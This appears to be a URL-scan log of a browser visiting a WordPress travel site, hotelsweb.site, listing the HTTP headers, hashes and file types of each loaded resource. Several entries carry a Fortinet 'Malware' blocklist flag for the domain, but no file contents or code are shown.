                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F83cd87b8-4041-419b-ab34-9f8e5a326f4b.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 12898
x-amzn-requestid: 9b594c3c-6b8c-4589-8fcb-b3d7518b46f6
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cQZBNFxToAMF_9A=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63833ba1-767f510d72eef86d0cc892df;Sampled=0
x-amzn-remapped-date: Sun, 27 Nov 2022 10:27:45 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: kZfRQsF_Fo2UtTqK0ByOPeQK-IzTQO9JtTmxIMlapmsd93SJk_4VYw==
via: 1.1 d1151317ba32afe0e6370fd69fed222e.cloudfront.net (CloudFront), 1.1 760139201585481b26f947c5f776103a.cloudfront.net (CloudFront), 1.1 google
date: Wed, 30 Nov 2022 21:47:30 GMT
age: 53895
etag: "84241ddddbbfd7de30118307fb1a62800d0a4cb3"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   12898
Md5:    820cf89fcab8380adff42982c9fb11ed
Sha1:   84241ddddbbfd7de30118307fb1a62800d0a4cb3
Sha256: 0d051495f06ac84de934283b40cbfee7a042d32153a73486dd7c017430e882d8
                                        
                                            GET / HTTP/1.1 
Host: hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

search
                                         199.250.192.223
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
                                        
Date: Thu, 01 Dec 2022 12:45:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=0fcd008c614b44b0c690d2c5ada6541f; path=/
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Location: http://www.hotelsweb.site/
Keep-Alive: timeout=3, max=100
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  
Size:   0
Md5:    d41d8cd98f00b204e9800998ecf8427e
Sha1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /css?family=Poppins%3A100%2C100i%2C200%2C200i%2C300%2C300i%2C400%2C400i%2C500%2C500i%2C600%2C600i%2C700%2C700i%2C800%2C800i%2C900%2C900i%7CMontserrat%3A100%2C100i%2C200%2C200i%2C300%2C300i%2C400%2C400i%2C500%2C500i%2C600%2C600i%2C700%2C700i%2C800%2C800i%2C900%2C900i&ver=4.9.22 HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/

search
                                         142.250.74.106
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Link: <http://fonts.gstatic.com>; rel=preconnect; crossorigin
Expires: Thu, 01 Dec 2022 12:45:48 GMT
Date: Thu, 01 Dec 2022 12:45:48 GMT
Cache-Control: private, max-age=86400
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin-allow-popups
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff


--- Additional Info ---
Magic:  ASCII text
Size:   1567
Md5:    21fb81ce19453cc2881683648067a1b0
Sha1:   7ae3d5c236bd2c2f2a51281c9360fc4e83194476
Sha256: 84a0c85fe5658c945452a3d3755f80e5231d4970787632bca35682d745e50486
                                        
                                            GET / HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Thu, 01 Dec 2022 12:45:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Link: <http://www.hotelsweb.site/wp-json/>; rel="https://api.w.org/", <http://www.hotelsweb.site/>; rel=shortlink
Set-Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d; path=/
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Keep-Alive: timeout=3, max=100
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (1746), with CRLF, LF line terminators
Size:   58479
Md5:    e7b9c7b0b6a7e46e696d4194b7b539d2
Sha1:   a9f6ac42dcf3ba1b9606b9a740d6797fc50f1527
Sha256: 55a5175ed572ad055c790c6566a2e84a9274588974db9a065efc091a37d07ae2

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/themes/hotel/css/table-4.css?ver=0.7.6 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 16062
Keep-Alive: timeout=3, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with CRLF line terminators
Size:   16062
Md5:    3ed3a9d9f950c83733ee8a82ffa15d8f
Sha1:   28ae6a9613a8ce1e7dfa604abcdc0367a4992827
Sha256: 510dd6b756909b251a65084a163d36b6d243ca7b79d0755906490f339100040b

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/css/lib/pikaday.css HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 4684
Keep-Alive: timeout=3, max=100


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with CRLF line terminators
Size:   4684
Md5:    502e287ce4ca080ead0a8289a15810cc
Sha1:   b06baa0ac62d5b6d2b8fb895407dc2a11c97ba15
Sha256: 88b3e18f3e71a7eaaefeefe989526b561a4794a1bf85463b3c5d1389bbf09b73
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/css/lib/currency_fonts_new/css/fontello.css HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 5496
Keep-Alive: timeout=3, max=100


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with CRLF line terminators
Size:   5496
Md5:    2ceb66a1760edac2ebaa7efaa97f0ca3
Sha1:   d5038e9840fc290c7148f5337a91b21ea78101f4
Sha256: 361a4e9ce04165203f44df41bcbc8fa9c81e95f09053dd89ba7dd6f3b8da8676
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/css/lib/currency_fonts_new/css/animation.css HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 1942
Keep-Alive: timeout=3, max=100


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   1942
Md5:    e7da1c1d837b0be2240c2c23bf0c4475
Sha1:   f763298ac4912e0e83793883936107722f130250
Sha256: 5693d3fc7e182e6415edeaf606b8d0ba0d8a6de5d3a94b64b74cf059abd211fa
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/themes/railway/css/main.css?ver=0.7.6 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 20785
Keep-Alive: timeout=3, max=100


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with CRLF line terminators
Size:   20785
Md5:    a206675233c8a964858991eaf645df39
Sha1:   56d5eef6490730d17ca2413848b3fd73958f289c
Sha256: 28da474e6fbe886c4cd0564a89574ef5a46eddd5f350a8fc4281df5ca3049022

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/css/lib/currency_fonts_new/css/TPCurrencyMainNew.css HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 1271
Keep-Alive: timeout=3, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   1271
Md5:    1044d55b99a57610129d4618b6620ec1
Sha1:   97aae484ecfdc78d7e13f94404ab3f27f25fa459
Sha256: 4c48338156876c15631f7cc86dd3f700d5b07b4a14202a7e67c8a85df91dcf5d
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/css/lib/jquery-ui/jquery-ui.min.css HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 25510
Keep-Alive: timeout=3, max=100


--- Additional Info ---
Magic:  ASCII text, with very long lines (25087), with CRLF line terminators
Size:   25510
Md5:    eee41be1b916c1472bc4097d5c1f69cd
Sha1:   fc18bca15fab1dcd93756ea120ef0e66ef226a7e
Sha256: 5f86a186f9d6c88457a9d56305917b1801028fcb93ba666e40aa6fc9c2176b21
                                        
                                            GET /wp-content/plugins/wp-travel-engine/public/css/wpte-gallery-public.css?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 1666
Keep-Alive: timeout=3, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   1666
Md5:    8593ca961b6bd7d62e5944a8d2890730
Sha1:   aea80a2238316cae018f965784dc9d9b81eb0fa8
Sha256: 4f320d5f6be5ecc466850c9180af37035f679c6ab4fe7d3cdfb9bc62035d4438
                                        
                                            GET /wp-content/plugins/wp-travel-engine/public/css/datepicker-style.css?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 34718
Keep-Alive: timeout=3, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (2363)
Size:   34718
Md5:    350e77261d50dc43cd08c416859466f7
Sha1:   1abb4c2864d42e3e8a7b3e60496cfe299435f47b
Sha256: bc9b2e8645e879b23d3c82afeb26e27125cb4faefaa295d82d599231bbcc2f40
                                        
                                            GET /wp-content/plugins/wp-travel-engine/public/css/wp-travel-engine-public.css?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 32626
Keep-Alive: timeout=3, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   32626
Md5:    369196b6e2e2d1cfb4a24bf651f9fe31
Sha1:   abe9c239a48b7025e3d360a08d5af66e9d180ec5
Sha256: 9bfef4084a5dc8ed59f084800964d46bdee4713a893d06b950ea1f772b4590b4

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Fri, 20 May 2016 15:41:28 GMT
Accept-Ranges: bytes
Content-Length: 10056
Keep-Alive: timeout=3, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (9959)
Size:   10056
Md5:    7121994eec5320fbe6586463bf9651c2
Sha1:   90532aff6d4121954254cdf04994d834f7ec169b
Sha256: 48eb8b500ae6a38617b5738d2b3faec481922a7782246e31d2755c034a45cd5d
                                        
                                            GET /wp-content/themes/travel-agency/style.css?ver=1.1.6 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Last-Modified: Fri, 17 Aug 2018 01:26:33 GMT
Accept-Ranges: bytes
Content-Length: 123942
Keep-Alive: timeout=3, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (927), with CRLF line terminators
Size:   123942
Md5:    0035400fa515be65b56ec0820eb80865
Sha1:   5c509fdb41d0e047a95ba258eb8fe7507682f8d4
Sha256: 073713b8fb8325cb226efc4582af8f275c9ed6970286278ae34fdd4d27ff0564

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/wp-travel-engine/public/css/animate.css?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 59816
Keep-Alive: timeout=3, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (460), with CRLF line terminators
Size:   59816
Md5:    7bc8cbfcaf2442bd7dffd475ba389870
Sha1:   1fac90a899f7121a06b44f3279161cc5202edd7b
Sha256: a3ab8a7883f3c0c6fd615c8d063859df0fb34380a6a85a3b9818a83eade03e3d
                                        
                                            GET /wp-content/plugins/travel-agency-companion/public/js/travel-agency-companion-public.js?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 1783
Keep-Alive: timeout=3, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   1783
Md5:    5ee7d8f5ef7567a2647a64a4dd8e4774
Sha1:   054ed1efbdd786f8ebf06642bbaad7e8a2b05933
Sha256: 70f9b5ce00020e38584b0414f3046b7db807a2c7b8717223090e28365b18f760

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Last-Modified: Thu, 05 Sep 2019 11:43:00 GMT
Accept-Ranges: bytes
Content-Length: 96874
Keep-Alive: timeout=3, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (31997)
Size:   96874
Md5:    dc5ba5044fccc0297be7b262ce669a7c
Sha1:   f137ff98ae379e35b0702967d3b6866a0a40e3be
Sha256: cf34e1b87bbfd9d9b185dec994924a496e279d8dc9387ad8d35bc0110134c4d3
                                        
                                            GET /wp-content/plugins/wp-travel-engine/public/js/custom.js?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 774
Keep-Alive: timeout=3, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   774
Md5:    2b79bb9c259d194556e2194f263ac2cc
Sha1:   00644d4ce0034edaa077b4541cef6647af14dc89
Sha256: f1ee9013083fe4a03f133438843cd3c7dbf55f0c35dc5e65b972588fa2c9f862
                                        
                                            GET /wp-content/plugins/wp-travel-engine/public/js/wp-travel-engine-public.js?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 14918
Keep-Alive: timeout=3, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   14918
Md5:    3ef0b718a87c392c04e63fb30cce4f31
Sha1:   a7abc1b1e72be04b95d84af8f0b7e6fb688329ac
Sha256: e48ba9df8e3e8cd41e512dcb41a5e9795da9e90b54486f5c7a3ce2789e069b24

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/wp-travel-engine/public/js/owl.carousel.js?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 88643
Keep-Alive: timeout=3, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (360), with CRLF line terminators
Size:   88643
Md5:    cd1dcb9678ef5dfb8c1d54f0a65a59da
Sha1:   d0146e93254743895d306adb31c0affecc9c4f77
Sha256: 2f0b434eae705d0e78d158abdad3a3555f3e69048104a541ba209775e48f86a4
                                        
                                            GET /wp-content/plugins/wp-travel-engine/public/js/wpte-gallery-public.js?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 456
Keep-Alive: timeout=3, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   456
Md5:    ff7c73bff6c6e6b84ce470e70a555da4
Sha1:   a838eea5c11063e64920af10af84500ab86fa012
Sha256: f2755069b539062f40158fb5be93bf08ad17e8d73470fd951069196accf1fff5

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/wp-travel-engine/public/js/wp-travel-engine-travelers-number.js?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 789
Keep-Alive: timeout=3, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   789
Md5:    04b2b318d9b8998d2276d9776b6a698d
Sha1:   21bc076588fa6fab74e2e577c6599b4307a9a149
Sha256: 09969ab7eb6d0857e1a5b401204220d022464e0b868f299645cb26a75d1f5e71
                                        
                                            GET /wp-includes/js/wp-emoji-release.min.js?ver=4.9.22 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
